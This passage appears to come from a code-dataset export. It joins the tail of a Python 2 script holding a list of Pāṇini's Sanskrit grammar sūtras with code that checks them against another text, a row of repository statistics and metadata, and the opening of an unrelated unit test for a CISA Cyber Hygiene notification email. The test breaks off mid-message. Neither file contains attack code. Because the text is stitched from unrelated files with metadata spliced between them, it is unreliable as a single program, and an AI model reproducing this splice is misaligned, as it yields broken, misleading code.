खयः","7.4.62::कुहोश्चुः","7.4.63::न कवतेर्यङि","7.4.64::कृषेश्छन्दसि","7.4.65::दाधर्तिदर्धर्तिदर्धर्षिबोभूतुतेतिक्तेऽलर्ष्यापनीफणत्संसनिष्यदत्करिक्रत्कनिक्रदद्भरिभ्रद्दविध्वतोदविद्युतत्तरित्रतःसरीसृपतंवरीवृजन्मर्मृज्यागनीगन्तीति च","7.4.66::उरत्","7.4.67::द्युतिस्वाप्योः सम्प्रसारणम्","7.4.68::व्यथो लिटि","7.4.69::दीर्घ इणः किति","7.4.70::अत आदेः","7.4.71::तस्मान्नुड् द्विहलः","7.4.72::अश्नोतेश्च","7.4.73::भवतेरः","7.4.74::ससूवेति निगमे","7.4.75::निजां त्रयाणां गुणः श्लौ","7.4.76::भृञामित्","7.4.77::अर्तिपिपर्त्योश्च","7.4.78::बहुलं छन्दसि","7.4.79::सन्यतः","7.4.80::ओः पुयण्ज्यपरे","7.4.81::स्रवतिशृणोतिद्रवतिप्रवतिप्लवतिच्यवतीनां वा","7.4.82::गुणो यङ्लुकोः","7.4.83::दीर्घोऽकितः","7.4.84::नीग्वञ्चुस्रंसुध्वंसुभ्रंसुकसपतपदस्कन्दाम्","7.4.85::नुगतोऽनुनासिकान्तस्य","7.4.86::जपजभदहदशभञ्जपशां च","7.4.87::चरफलोश्च","7.4.88::उत् परस्यातः","7.4.89::ति च","7.4.90::रीगृदुपधस्य च","7.4.91::रुग्रिकौ च लुकि","7.4.92::ऋतश्च","7.4.93:अतिदेशः:सन्वल्लघुनि चङ्परेऽनग्लोपे","7.4.94::दीर्घो लघोः","7.4.95::अत् स्मृदृत्वरप्रथम्रदस्तॄस्पशाम्","7.4.96::विभाषा वेष्टिचेष्ट्योः","7.4.97::ई च गणः","8.1.1:अधिकारः:सर्वस्य द्वे","8.1.2:संज्ञा:तस्य परमाम्रेडितम्","8.1.3::अनुदात्तं च","8.1.4::नित्यवीप्सयोः","8.1.5::परेर्वर्जने","8.1.6::प्रसमुपोदः पादपूरणे","8.1.7::उपर्यध्यधसः सामीप्ये","8.1.8::वाक्यादेरामन्त्रितस्यासूयासम्मतिकोपकुत्सनभर्त्सनेषु","8.1.9:अतिदेशः:एकं बहुव्रीहिवत्","8.1.10::आबाधे च","8.1.11:अतिदेशः:कर्मधारयवत् उत्तरेषु","8.1.12::प्रकारे गुणवचनस्य","8.1.13::अकृच्छ्रे प्रियसुखयोरन्यतरस्याम्","8.1.14::यथास्वे यथायथम्","8.1.15::द्वन्द्वं रहस्यमर्यादावचनव्युत्क्रमणयज्ञपात्रप्रयोगाभिव्यक्तिषु","8.1.16:अधिकारः:पदस्य","8.1.17:अधिकारः:पदात्","8.1.18:अधिकारः:अनुदात्तं सर्वमपादादौ","8.1.19::आमन्त्रितस्य च","8.1.20::युष्मदस्मदोः षष्ठीचतुर्थीद्वितीयास्थयोर्वान्नावौ","8.1.21::बहुवचने वस्नसौ","8.1.22::तेमयावेकवचनस्य","8.1.23::त्वामौ द्वितीयायाः","8.1.24::न चवाहाहैवयुक्ते","8.1.25::पश्यार्थैश्चानालोचने","8.1.26::सपूर्वायाः प्रथमाया विभाषा","8.1.27::तिङो गोत्रादीनि कुत्सनाभीक्ष्ण्ययोः","8.1.28::तिङ्ङतिङः","8.1.29::न लुट्","8.1.30::निपातैर्यद्यदिहन्तकुविन्नेच्चेच्चण्कच्चिद्यत्रयुक्तम्","8.1.31::नह प्रत्यारम्भे","8.1.32::सत्यं प्रश्ने","8.1.33::अङ्गाप्रातिलोम्ये","8.1.34::हि च","8.1.35::छन्दस्यनेकमपि साकाङ्क्षम्","8.1.36::यावद्यथाभ्याम्","8.1.37::पूजायां नानन्तरम्","8.1.38::उपसर्गव्यपेतं च","8.1.39::तुपश्यपश्यताहैः पूजायाम्","8.1.40::अहो च","8.1.41::शेषे विभाषा","8.1.42::पुरा च परीप्सायाम्","8.1.43::नन्वित्यनुज्ञैषणायाम्","8.1.44::किं क्रियाप्रश्नेऽनुपसर्गमप्रतिषिद्धम्","8.1.45::लोपे विभाषा","8.1.46::एहिमन्ये प्रहासे लृट्","8.1.47::जात्वपूर्वम्","8.1.48::किम्वृत्तं च चिदुत्तरम्","8.1.49::आहो उताहो चानन्तरम्","8.1.50::शेषे विभाषा","8.1.51::गत्यर्थलोटा लृण्न चेत् कारकं सर्वान्यत्","8.1.52::लोट् च","8.1.53::विभाषितं सोपसर्गमनुत्तमम्","8.1.54::हन्त च","8.1.55::आम एकान्तरमामन्त्रितमनन्तिके","8.1.56::यद्धितुपरं छन्दसि","8.1.57::चनचिदिवगोत्रादितद्धिताम्रेडितेष्वगतेः","8.1.58::चादिषु च","8.1.59::चवायोगे प्रथमा","8.1.60::हेति क्षियायाम्","8.1.61::अहेति विनियोगे च","8.1.62::चाहलोप एवेत्यवधारणम्","8.1.63::चादिलोपे विभाषा","8.1.64::वैवावेति च च्छन्दसि","8.1.65::एकान्याभ्यां समर्थाभ्याम्","8.1.66::यद्वृत्तान्नित्यं","8.1.67::पूजनात् पूजितमनुदात्तम् {काष्ठादिभ्यः}","8.1.68::सगतिरपि तिङ्","8.1.69::कुत्सने च सुप्यगोत्रादौ","8.1.70::गतिर्गतौ","8.1.71::तिङि चोदात्तवति","8.1.72:अतिदेशः:आमन्त्रितं पूर्वम् अविद्यमानवत्","8.1.73::नामन्त्रिते समानाधिकरणे {सामान्यवचनम्}","8.1.74::विभाषितं विशेषवचने बहुवचनम्","8.2.1:अतिदेशः; अधिकारः:पूर्वत्रासिद्धम्","8.2.2:अतिदेशः:नलोपः सुप्स्वरसंज्ञातुग्विधिषु कृति","8.2.3:अतिदेशः:न मु ने","8.2.4:अतिदेशः:उदात्तस्वरितयोर्यणः स्वरितोऽनुदात्तस्य","8.2.5:अतिदेशः:एकादेश उदात्तेनोदात्तः","8.2.6:अतिदेशः:स्वरितो वाऽनुदात्ते पदादौ","8.2.7:अतिदेशः:नलोपः प्रातिपदिकान्तस्य","8.2.8:अतिदेशः:न ङिसम्बुद्ध्योः","8.2.9:अतिदेशः:मादुपधायाश्च मतोर्वोऽयवादिभ्यः","8.2.10:अतिदेशः:झयः","8.2.11:अतिदेशः:संज्ञायाम्","8.2.12:अतिदेशः:आसन्दीवदष्ठीवच्चक्रीवत्कक्षीवद्रुमण्वच्चर्मण्वती","8.2.13:अतिदेशः:उदन्वानुदधौ च","8.2.14:अतिदेशः:राजन्वान् सौराज्ये","8.2.15:अतिदेशः:छन्दसीरः","8.2.16:अतिदेशः:अनो नुट्","8.2.17:अतिदेशः:नाद्घस्य","8.2.18:अतिदेशः:कृपो रो लः","8.2.19:अतिदेशः:उपसर्गस्यायतौ","8.2.20:अतिदेशः:ग्रो यङि","8.2.21:अतिदेशः:अचि विभाषा","8.2.22:अतिदेशः:परेश्च घाङ्कयोः","8.2.23:अतिदेशः:संयोगान्तस्य लोपः","8.2.24:अतिदेशः:रात् सस्य","8.2.25:अतिदेशः:धि च","8.2.26:अतिदेशः:झलो झलि","8.2.27:अतिदेशः:ह्रस्वादङ्गात्","8.2.28:अतिदेशः:इट ईटि","8.2.29:अतिदेशः:स्कोः संयोगाद्योरन्ते च","8.2.30:अतिदेशः:चोः कुः","8.2.31:अतिदेशः:हो ढः","8.2.32:अतिदेशः:दादेर्धातोर्घः","8.2.33:अतिदेशः:वा द्रुहमुहष्णुहष्णिहाम्","8.2.34:अतिदेशः:नहो धः","8.2.35:अतिदेशः:आहस्थः","8.2.36:अतिदेशः:व्रश्चभ्रस्जसृजमृजयजराजभ्राजच्छशां षः","8.2.37:अतिदेशः:एकाचो बशो भष् झषन्तस्य स्ध्वोः","8.2.38:अतिदेशः:दधस्तथोश्च","8.2.39:अतिदेशः:झलां जशोऽन्ते","8.2.40:अतिदेशः:झषस्तथोर्धोऽधः","8.2.41:अतिदेशः:षढोः कः सि","8.2.42:अतिदेशः:रदाभ्यां निष्ठातो नः पूर्वस्य च दः","8.2.43:अतिदेशः:संयोगादेरातो धातोर्यण्वतः","8.2.44:अतिदेशः:ल्वादिभ्यः","8.2.45:अतिदेशः:ओदितश्च","8.2.46:अतिदेशः:क्षियो दीर्घात्","8.2.47:अतिदेशः:श्योऽस्पर्शे","8.2.48:अतिदेशः:अञ्चोऽनपादाने","8.2.49:अतिदेशः:दिवोऽविजिगीषायाम्","8.2.50:अतिदेशः:निर्वाणोऽवाते","8.2.51:अतिदेशः:शुषः कः","8.2.52:अतिदेशः:पचो वः","8.2.53:अतिदेशः:क्षायो मः","8.2.54:अतिदेशः:प्रस्त्योऽन्यतरस्याम्","8.2.55:अतिदेशः:अनुपसर्गात् फुल्लक्षीबकृशोल्लाघाः","8.2.56:अतिदेशः:नुदविदोन्दत्राघ्राह्रीभ्योऽन्यतरस्याम्","8.2.57:अतिदेशः:न ध्याख्यापॄमूर्छिमदाम्","8.2.58:अतिदेशः:वित्तो भोगप्रत्यययोः","8.2.59:अतिदेशः:भित्तं शकलम्","8.2.60:अतिदेशः:ऋणमाधमर्ण्ये","8.2.61:अतिदेशः:नसत्तनिषत्तानुत्तप्रतूर्तसूर्तगूर्तानि छन्दसि","8.2.62:अतिदेशः:क्विन्प्रत्ययस्य कुः","8.2.63:अतिदेशः:नशेर्वा","8.2.64:अतिदेशः:मो नो धातोः","8.2.65:अतिदेशः:म्वोश्च","8.2.66:अतिदेशः:ससजुषो रुः","8.2.67:अतिदेशः:अवयाःश्वेतवाःपुरोडाश्च","8.2.68:अतिदेशः:अहन्","8.2.69:अतिदेशः:रोऽसुपि","8.2.70:अतिदेशः:अम्नरूधरवरित्युभयथा छन्दसि","8.2.71:अतिदेशः:भुवश्च महाव्याहृतेः","8.2.72:अतिदेशः:वसुस्रंसुध्वंस्वनडुहां दः","8.2.73:अतिदेशः:तिप्यनस्तेः","8.2.74:अतिदेशः:सिपि धातो रुर्वा","8.2.75:अतिदेशः:दश्च","8.2.76:अतिदेशः:र्वोरुपधाया दीर्घ इकः","8.2.77:अतिदेशः:हलि च","8.2.78:अतिदेशः:उपधायां च","8.2.79:अतिदेशः:न भकुर्छुराम्","8.2.80:अतिदेशः:अदसोऽसेर्दादु दो मः","8.2.81:अतिदेशः:एत ईद्बहुवचने","8.2.82:अतिदेशः; अधिकारः:वाक्यस्य टेः प्लुत उदात्तः","8.2.83:अतिदेशः:प्रत्यभिवादेअशूद्रे","8.2.84:अतिदेशः:दूराद्धूते च","8.2.85:अतिदेशः:हैहेप्रयोगे हैहयोः","8.2.86:अतिदेशः:गुरोरनृतोऽनन्त्यस्याप्येकैकस्य प्राचाम्","8.2.87:अतिदेशः:ओमभ्यादाने","8.2.88:अतिदेशः:ये यज्ञकर्मणि","8.2.89:अतिदेशः:प्रणवष्टेः","8.2.90:अतिदेशः:याज्याऽन्तः","8.2.91:अतिदेशः:ब्रूहिप्रेस्यश्रौषड्वौषडावहानामादेः","8.2.92:अतिदेशः:अग्नीत्प्रेषणे परस्य च","8.2.93:अतिदेशः:विभाषा पृष्टप्रतिवचने हेः","8.2.94:अतिदेशः:निगृह्यानुयोगे च","8.2.95:अतिदेशः:आम्रेडितं भर्त्सने","8.2.96:अतिदेशः:अङ्गयुक्तं तिङ् आकाङ्क्षम्","8.2.97:अतिदेशः:विचार्यमाणानाम्","8.2.98:अतिदेशः:पूर्वं तु भाषायाम्","8.2.99:अतिदेशः:प्रतिश्रवणे च","8.2.100:अतिदेशः:अनुदात्तं प्रश्नान्ताभिपूजितयोः","8.2.101:अतिदेशः:चिदिति चोपमाऽर्थे प्रयुज्यमाने","8.2.102:अतिदेशः:उपरिस्विदासीदिति च","8.2.103:अतिदेशः:स्वरितमाम्रेडितेऽसूयासम्मतिकोपकुत्सनेषु","8.2.104:अतिदेशः:क्षियाऽऽशीःप्रैषेषु तिङ् आकाङ्क्षम्","8.2.105:अतिदेशः:अनन्त्यस्यापि प्रश्नाख्यानयोः","8.2.106:अतिदेशः:प्लुतावैच इदुतौ","8.2.107:अतिदेशः:एचोऽप्रगृह्यस्यादूराद्धूते पूर्वस्यार्धस्यादुत्तरस्येदुतौ","8.2.108:अतिदेशः; अधिकारः:तयोर्य्वावचि संहितायाम्","8.3.1:अतिदेशः:मतुवसो रु सम्बुद्धौ छन्दसि","8.3.2:अतिदेशः:अत्रानुनासिकः पूर्वस्य तु वा","8.3.3:अतिदेशः:आतोऽटि नित्यम्","8.3.4:अतिदेशः:अनुनासिकात् परोऽनुस्वारः","8.3.5:अतिदेशः:समः सुटि","8.3.6:अतिदेशः:पुमः खय्यम्परे","8.3.7:अतिदेशः:नश्छव्यप्रशान्","8.3.8:अतिदेशः:उभयथर्क्षु","8.3.9:अतिदेशः:दीर्घादटि समानपदे","8.3.10:अतिदेशः:नॄन् पे","8.3.11:अतिदेशः:स्वतवान् पायौ","8.3.12:अतिदेशः:कानाम्रेडिते","8.3.13:अतिदेशः:ढो ढे लोपः","8.3.14:अतिदेशः:रो रि","8.3.15:अतिदेशः:खरवसानयोर्विसर्जनीयः","8.3.16:अतिदेशः:रोः सुपि","8.3.17:अतिदेशः:भोभगोअघोअपूर्वस्य योऽशि","8.3.18:अतिदेशः:व्योर्लघुप्रयत्नतरः शाकटायनस्य","8.3.19:अतिदेशः:लोपः शाकल्यस्य","8.3.20:अतिदेशः:ओतो गार्ग्यस्य","8.3.21:अतिदेशः:उञि च पदे","8.3.22:अतिदेशः:हलि सर्वेषाम्","8.3.23:अतिदेशः:मोऽनुस्वारः","8.3.24:अतिदेशः:नश्चापदान्तस्य झलि","8.3.25:अतिदेशः:मो राजि समः क्वौ","8.3.26:अतिदेशः:हे मपरे वा","8.3.27:अतिदेशः:नपरे नः","8.3.28:अतिदेशः:ङ्णोः कुक्टुक् शरि","8.3.29:अतिदेशः:डः सि धुट्","8.3.30:अतिदेशः:नश्च","8.3.31:अतिदेशः:शि तुक्","8.3.32:अतिदेशः:ङमो ह्रस्वादचि ङमुण्नित्यम्","8.3.33:अतिदेशः:मय उञो वो वा","8.3.34:अतिदेशः:विसर्जनीयस्य सः","8.3.35:अतिदेशः:शर्परे विसर्जनीयः","8.3.36:अतिदेशः:वा शरि","8.3.37:अतिदेशः:कुप्वोः XकXपौ च","8.3.38:अतिदेशः:सोऽपदादौ","8.3.39:अतिदेशः:इणः षः","8.3.40:अतिदेशः:नमस्पुरसोर्गत्योः","8.3.41:अतिदेशः:इदुदुपधस्य चाप्रत्ययस्य","8.3.42:अतिदेशः:तिरसोऽन्यतरस्याम्","8.3.43:अतिदेशः:द्विस्त्रिश्चतुरिति कृत्वोऽर्थे","8.3.44:अतिदेशः:इसुसोः सामर्थ्ये","8.3.45:अतिदेशः:नित्यं समासेऽनुत्तरपदस्थस्य","8.3.46:अतिदेशः:अतः कृकमिकंसकुम्भपात्रकुशाकर्णीष्वनव्ययस्य","8.3.47:अतिदेशः:अधःशिरसी पदे","8.3.48:अतिदेशः:कस्कादिषु च","8.3.49:अतिदेशः:छन्दसि वाऽप्राम्रेडितयोः","8.3.50:अतिदेशः:कःकरत्करतिकृधिकृतेष्वनदितेः","8.3.51:अतिदेशः:पञ्चम्याः परावध्यर्थे","8.3.52:अतिदेशः:पातौ च बहुलम्","8.3.53:अतिदेशः:षष्ठ्याः पतिपुत्रपृष्ठपारपदपयस्पोषेषु","8.3.54:अतिदेशः:इडाया वा","8.3.55:अतिदेशः; अधिकारः:अपदान्तस्य मूर्धन्यः","8.3.56:अतिदेशः:सहेः साडः सः","8.3.57:अतिदेशः; अधिकारः:इण्कोः","8.3.58:अतिदेशः:नुम्विसर्जनीयशर्व्यवायेऽपि","8.3.59:अतिदेशः:आदेशप्रत्यययोः","8.3.60:अतिदेशः:शासिवसिघसीनां च","8.3.61:अतिदेशः:स्तौतिण्योरेव षण्यभ्यासात्","8.3.62:अतिदेशः:सः स्विदिस्वदिसहीनां च","8.3.63:अतिदेशः:प्राक्सितादड्व्यवायेऽपि","8.3.64:अतिदेशः:स्थाऽऽदिष्वभ्यासेन चाभ्यासय","8.3.65:अतिदेशः:उपसर्गात् सुनोतिसुवतिस्यतिस्तौतिस्तोभतिस्थासेनयसेधसिचसञ्जस्वञ्जाम्","8.3.66:अतिदेशः:सदिरप्रतेः","8.3.67:अतिदेशः:स्तम्भेः","8.3.68:अतिदेशः:अवाच्चालम्बनाविदूर्ययोः","8.3.69:अतिदेशः:वेश्च स्वनो भोजने","8.3.70:अतिदेशः:परिनिविभ्यः सेवसितसयसिवुसहसुट्स्तुस्वञ्जाम्","8.3.71:अतिदेशः:सिवादीनां वाऽड्व्यवायेऽपि","8.3.72:अतिदेशः:अनुविपर्यभिनिभ्यः स्यन्दतेरप्राणिषु","8.3.73:अतिदेशः:वेः स्कन्देरनिष्ठायाम्","8.3.74:अतिदेशः:परेश्च","8.3.75:अतिदेशः:परिस्कन्दः प्राच्यभरतेषु","8.3.76:अतिदेशः:स्फुरतिस्फुलत्योर्निर्निविभ्यः","8.3.77:अतिदेशः:वेः स्कभ्नातेर्नित्यम्","8.3.78:अतिदेशः:इणः षीध्वंलुङ्लिटां धोऽङ्गात्","8.3.79:अतिदेशः:विभाषेटः","8.3.80:अतिदेशः:समासेऽङ्गुलेः सङ्गः","8.3.81:अतिदेशः:भीरोः स्थानम्","8.3.82:अतिदेशः:अग्नेः स्तुत्स्तोमसोमाः","8.3.83:अतिदेशः:ज्योतिरायुषः स्तोमः","8.3.84:अतिदेशः:मातृपितृभ्यां स्वसा","8.3.85:अतिदेशः:मातुःपितुर्भ्यामन्यतरस्याम्","8.3.86:अतिदेशः:अभिनिसः स्तनः शब्दसंज्ञायाम्","8.3.87:अतिदेशः:उपसर्गप्रादुर्भ्यामस्तिर्यच्परः","8.3.88:अतिदेशः:सुविनिर्दुर्भ्यः सुपिसूतिसमाः","8.3.89:अतिदेशः:निनदीभ्यां स्नातेः कौशले","8.3.90:अतिदेशः:सूत्रं प्रतिष्णातम्","8.3.91:अतिदेशः:कपिष्ठलो गोत्रे","8.3.92:अतिदेशः:प्रष्ठोऽग्रगामिनि","8.3.93:अतिदेशः:वृक्षासनयोर्विष्टरः","8.3.94:अतिदेशः:छन्दोनाम्नि च","8.3.95:अतिदेशः:गवियुधिभ्यां स्थिरः","8.3.96:अतिदेशः:विकुशमिपरिभ्यः स्थलम्","8.3.97:अतिदेशः:अम्बाम्बगोभूमिसव्यापद्वित्रिकुशेकुशङ्क्वङ्गुमञ्जिपुञ्जिपरमेबर्हिर्दिव्यग्निभ्यः स्थः","8.3.98:अतिदेशः:सुषामादिषु च","8.3.99:अतिदेशः:ऐति संज्ञायामगात्","8.3.100:अतिदेशः:नक्षत्राद्वा","8.3.101:अतिदेशः:ह्रस्वात् तादौ तद्धिते","8.3.102:अतिदेशः:निसस्तपतावनासेवने","8.3.103:अतिदेशः:युष्मत्तत्ततक्षुःष्वन्तःपादम्","8.3.104:अतिदेशः:यजुष्येकेषाम्","8.3.105:अतिदेशः:स्तुतस्तोमयोश्छन्दसि","8.3.106:अतिदेशः:पूर्वपदात्","8.3.107:अतिदेशः:सुञः","8.3.108:अतिदेशः:सनोतेरनः","8.3.109:अतिदेशः:सहेः पृतनर्ताभ्यां च","8.3.110:अतिदेशः:न रपरसृपिसृजिस्पृशिस्पृहिसवनादीनाम्","8.3.111:अतिदेशः:सात्पदाद्योः","8.3.112:अतिदेशः:सिचो यङि","8.3.113:अतिदेशः:सेधतेर्गतौ","8.3.114:अतिदेशः:प्रतिस्तब्धनिस्तब्धौ च","8.3.115:अतिदेशः:सोढः","8.3.116:अतिदेशः:स्तम्भुसिवुसहां चङि","8.3.117:अतिदेशः:सुनोतेः स्यसनोः","8.3.118:अतिदेशः:सदिष्वञ्जोः परस्य लिटि","8.3.119:अतिदेशः:निव्यभिभ्योऽड्व्यावये वा छन्दसि","8.4.1:अतिदेशः:रषाभ्यां नो णः समानपदे","8.4.2:अतिदेशः:अट्कुप्वाङ्नुम्व्यवायेऽपि","8.4.3:अतिदेशः:पूर्वपदात् संज्ञायामगः","8.4.4:अतिदेशः:वनं पुरगामिश्रकासिध्रकाशारिकाकोटराऽग्रेभ्यः","8.4.5:अतिदेशः:प्रनिरन्तःशरेक्षुप्लक्षाम्रकार्ष्यखदिरपियूक्षाभ्योऽसंज्ञायामपि","8.4.6:अतिदेशः:विभाषौषधिवनस्पतिभ्यः","8.4.7:अतिदेशः:अह्नोऽदन्तात्","8.4.8:अतिदेशः:वाहनमाहितात्","8.4.9:अतिदेशः:पानं देशे","8.4.10:अतिदेशः:वा भावकरणयोः","8.4.11:अतिदेशः:प्रातिपदिकान्तनुम्विभक्तिषु च","8.4.12:अतिदेशः:एकाजुत्तरपदे णः","8.4.13:अतिदेशः:कुमति च","8.4.14:अतिदेशः:उपसर्गादसमासेऽपि णोपदेशस्य","8.4.15:अतिदेशः:हिनुमीना","8.4.16:अतिदेशः:आनि लोट्","8.4.17:अतिदेशः:नेर्गदनदपतपदघुमास्यतिहन्तियातिवातिद्रातिप्सातिवपतिवहतिशाम्यतिचिनोतिदेग्धिषु च","8.4.18:अतिदेशः:शेषे विभाषाऽकखादावषान्त उपदेशे","8.4.19:अतिदेशः:अनितेः","8.4.20:अतिदेशः:अन्तः","8.4.21:अतिदेशः:उभौ साभ्यासस्य","8.4.22:अतिदेशः:हन्तेरत्पूर्वस्य","8.4.23:अतिदेशः:वमोर्वा","8.4.24:अतिदेशः:अन्तरदेशे","8.4.25:अतिदेशः:अयनं च","8.4.26:अतिदेशः:छन्दस्यृदवग्रहात्","8.4.27:अतिदेशः:नश्च धातुस्थोरुषुभ्यः","8.4.28:अतिदेशः:उपसर्गाद् बहुलम्","8.4.29:अतिदेशः:कृत्यचः","8.4.30:अतिदेशः:णेर्विभाषा","8.4.31:अतिदेशः:हलश्च इजुपधात्","8.4.32:अतिदेशः:इजादेः सनुमः","8.4.33:अतिदेशः:वा निंसनिक्षनिन्दाम्","8.4.34:अतिदेशः:न भाभूपूकमिगमिप्यायीवेपाम्","8.4.35:अतिदेशः:षात् पदान्तात्","8.4.36:अतिदेशः:नशेः षान्तस्य","8.4.37:अतिदेशः:पदान्तस्य","8.4.38:अतिदेशः:पदव्यवायेऽपि","8.4.39:अतिदेशः:क्षुभ्नाऽऽदिषु च","8.4.40:अतिदेशः:स्तोः श्चुना श्चुः","8.4.41:अतिदेशः:ष्टुना ष्टुः","8.4.42:अतिदेशः:न पदान्ताट्टोरनाम्","8.4.43:अतिदेशः:तोः षि","8.4.44:अतिदेशः:शात्","8.4.45:अतिदेशः:यरोऽनुनासिकेऽनुनासिको वा","8.4.46:अतिदेशः:अचो रहाभ्यां द्वे","8.4.47:अतिदेशः:अनचि च","8.4.48:अतिदेशः:नादिन्याक्रोशे पुत्रस्य","8.4.49:अतिदेशः:शरोऽचि","8.4.50:अतिदेशः:त्रिप्रभृतिषु शाकटायनस्य","8.4.51:अतिदेशः:सर्वत्र शाकल्यस्य","8.4.52:अतिदेशः:दीर्घादाचार्याणाम्","8.4.53:अतिदेशः:झलां जश् झशि","8.4.54:अतिदेशः:अभ्यासे चर्च्च","8.4.55:अतिदेशः:खरि च","8.4.56:अतिदेशः:वाऽवसाने","8.4.57:अतिदेशः:अणोऽप्रगृह्यस्यानुनासिकः","8.4.58:अतिदेशः:अनुस्वारस्य ययि परसवर्णः","8.4.59:अतिदेशः:वा पदान्तस्य","8.4.60:अतिदेशः:तोर्लि","8.4.61:अतिदेशः:उदः स्थास्तम्भोः पूर्वस्य","8.4.62:अतिदेशः:झयो होऽन्यतरस्याम्","8.4.63:अतिदेशः:शश्छोऽटि","8.4.64:अतिदेशः:हलो यमां यमि लोपः","8.4.65:अतिदेशः:झरो झरि सवर्णे","8.4.66:अतिदेशः:उदात्तादनुदात्तस्य स्वरितः","8.4.67:अतिदेशः:नोदात्तस्वरितोदयमगार्ग्यकाश्यपगालवानाम्","8.4.68:अतिदेशः:अ अ इति"]
def basedata():
global ASdata
sutrawise = {}
sutratextonly = []
sutrawisespaceless = {}
sutratextonlyspaceless = []
for member in ASdata:
(a,b,c) = member.split(':')
orig = c.decode('utf-8')
c = c.decode('utf-8')
c = transcoder.transcoder_processString(c,'deva','slp1')
c = c.replace(u'\u200c',u'')
c = c.replace(u'\u200d',u'')
c = c.replace(u"'",u"")
c = re.sub('[NYRnmM]','M',c)
c = re.sub('cC','C',c)
c = re.sub('-','',c)
c = c.replace('.','')
a = a.replace('.','-')
sutrawise[a] = orig
sutratextonly.append(orig)
sutrawisespaceless[a] = c
sutratextonlyspaceless.append(c.replace(' ',''))
return sutrawise, sutratextonly, sutrawisespaceless, sutratextonlyspaceless
sutrawise, sutratextonly, sutrawisespaceless, sutratextonlyspaceless = basedata()
class sutra():
def __init__(self,line):
m = re.search(u'{#([0-9]+)#}[ ]*(.*)[ ]*{@([0-9-]+)@}',line)
self.base = m.group(2).strip()
c = unicode(transcoder.transcoder_processString(self.base,'deva','slp1'))
c = c.replace(u'\u200c',u'')
c = c.replace(u'\u200d',u'')
c = re.sub('[NYRnmM]','M',c)
c = re.sub('cC','C',c)
c = re.sub('-','',c)
c = c.replace('.','')
self.text = c
self.num = m.group(3)
self.sk = m.group(1)
self.textspaceless = self.text.replace(' ','')
def maketest(line):
global sutratextonlyspaceless, sutrawise
if re.search(u'{#([0-9]+)#}(.*){@([0-9-]+)@}',line):
sutradata = sutra(line)
#print sutradata.num, sutradata.text.encode('utf-8')
"""
linestripped = re.sub(u'{#([0-9]+)#}(.*){@([0-9-]+)@}',u'\g<2>',line)
#linestripped = linestripped.replace(' ','')
linestripped = linestripped.encode('utf-8')
linestripped = linestripped.strip()
print linestripped
"""
if sutradata.textspaceless.replace(u"'","") in sutratextonlyspaceless:
pass
elif sutradata.textspaceless not in sutratextonlyspaceless:
#print '; '+sutradata.sk+' '+sutradata.text.encode('utf-8')+' '+sutradata.num.encode('utf-8')
print '; '+line.strip().encode('utf-8')
if sutradata.num in sutrawise:
print transcoder.transcoder_processString(sutrawise[sutradata.num],'slp1','deva').encode('utf-8')
else:
print ''
data = codecs.open('../sk1.txt','r','utf-8')
for line in data:
maketest(line)
| 1,249.356436 | 123,697 | 0.49666 | 73,935 | 126,185 | 1.272767 | 0.032664 | 0.030796 | 0.017247 | 0.022061 | 0.518395 | 0.394986 | 0.309483 | 0.218454 | 0.135087 | 0.088978 | 0 | 0.136615 | 0.028585 | 126,185 | 100 | 123,698 | 1,261.85 | 0.374602 | 0.002053 | 0 | 0.2 | 0 | 29.65 | 0.89075 | 0.418815 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.016667 | 0.05 | null | null | 0.05 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0d4bc802d10f50ee49a3c56f9594678f5e15ada3 | 38,035 | py | Python | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 3 | 2017-12-06T07:45:35.000Z | 2018-06-25T20:08:09.000Z | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 33 | 2017-12-11T16:07:04.000Z | 2019-02-25T14:09:45.000Z | tests/test_cyhynotificationmessage.py | dhs-ncats/cyhy-mailer | 7050d6774e64dffb61c11a2cba358b7236f73054 | [
"CC0-1.0"
] | 2 | 2018-03-30T21:46:14.000Z | 2018-07-02T18:01:23.000Z | """This module contains the tests for the CyhyNotificationMessage class."""
# Standard Python Libraries
import unittest
# cisagov Libraries
from cyhy.mailer.CyhyNotificationMessage import CyhyNotificationMessage
class Test(unittest.TestCase):
"""The tests for the CyhyNotificationMessage class."""
def test_four_params_single_recipient_fed(self):
"""Test the 4-parameter Federal version of the constructor."""
to = ["recipient@example.com"]
pdf = "./tests/data/pdf-sample.pdf"
agency_acronym = "FEDTEST"
is_federal = True
report_date = "December 15, 2001"
message = CyhyNotificationMessage(
to, pdf, agency_acronym, is_federal, report_date
)
self.assertEqual(message["From"], "reports@cyber.dhs.gov")
self.assertEqual(
message["Subject"],
"FEDTEST - Cyber Hygiene Alert - December 15, 2001",
)
self.assertEqual(message.get("CC"), None)
self.assertEqual(message["BCC"], "cyhy_reports@hq.dhs.gov")
self.assertEqual(message["To"], "recipient@example.com")
# Grab the bytes that comprise the attachment
bytes = open(pdf, "rb").read()
# Make sure the correct body and PDF attachments were added
for part in message.walk():
# multipart/* are just containers
if part.get_content_type() == "application/pdf":
self.assertEqual(part.get_payload(decode=True), bytes)
self.assertEqual(part.get_filename(), "pdf-sample.pdf")
elif part.get_content_type() == "text/plain":
text_body = """Greetings FEDTEST,
Cyber Hygiene scans of your host(s) conducted in the past day have detected one or both of the following:
* New critical and/or high vulnerabilities
* New potentially risky services
As part of BOD 19-02, critical findings need to be remediated within 15 days and high findings remediated within 30 days.
CISA also recommends reviewing hosts with potentially risky open services (e.g. RDP, Telnet, etc.) to ensure that each service is intended to be available to the public and, where applicable, the service is up-to-date on the latest version, correctly configured, and uses strong authentication.
The details are in the attached PDF, which has the same password as your Cyber Hygiene report.
If you have any questions, please contact our office.
Cheers,
CISA Cyber Assessments - Cyber Hygiene
Cybersecurity and Infrastructure Security Agency
vulnerability@cisa.dhs.gov
